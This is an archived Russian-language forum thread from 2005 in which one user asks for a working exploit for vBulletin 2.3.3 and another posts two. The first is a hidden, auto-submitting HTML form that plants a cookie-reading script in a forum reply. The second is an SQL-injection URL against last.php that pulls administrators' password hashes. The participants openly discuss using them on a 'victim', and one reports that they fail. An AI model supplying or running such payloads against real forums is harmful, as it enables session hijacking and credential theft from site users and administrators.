PDA

Просмотр полной версии : Уязвимости в vBulletin v2.3.3


SK | Heaton
01.08.2005, 12:24
Народ у ко нить есть реальный экплойт для vBulletin V2.3.3?!!!! Если есть по делитесь.. Плиз..

ProTeuS
01.08.2005, 18:48
примеры сплойтов:

-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)">"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>

----------------------------------------------------

last.php?fsel=,user.password%20as%20title,user.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

----------------------------------------------------

SK | Heaton
02.08.2005, 11:51
2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!

ProTeuS
02.08.2005, 14:32
2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!
это не мой сплойт...но, как я понимаю, это форма для отправки мессаги, код которой будет исполняться в браузере жертвы

+ ты еще не заметил второй сплойт ниже, в старых версиях он может работать...

SK | Heaton
02.08.2005, 14:59
2 ProTeuS сделал... че-то не получается !!!

GreenBear
02.08.2005, 15:22
http://www.securitylab.ru/?ID=1671&Search_String=vBulletin

SK | Heaton
02.08.2005, 15:45
http://www.securitylab.ru/?ID=1671&Search_String=vBulletin

прикинь пробовал не получается....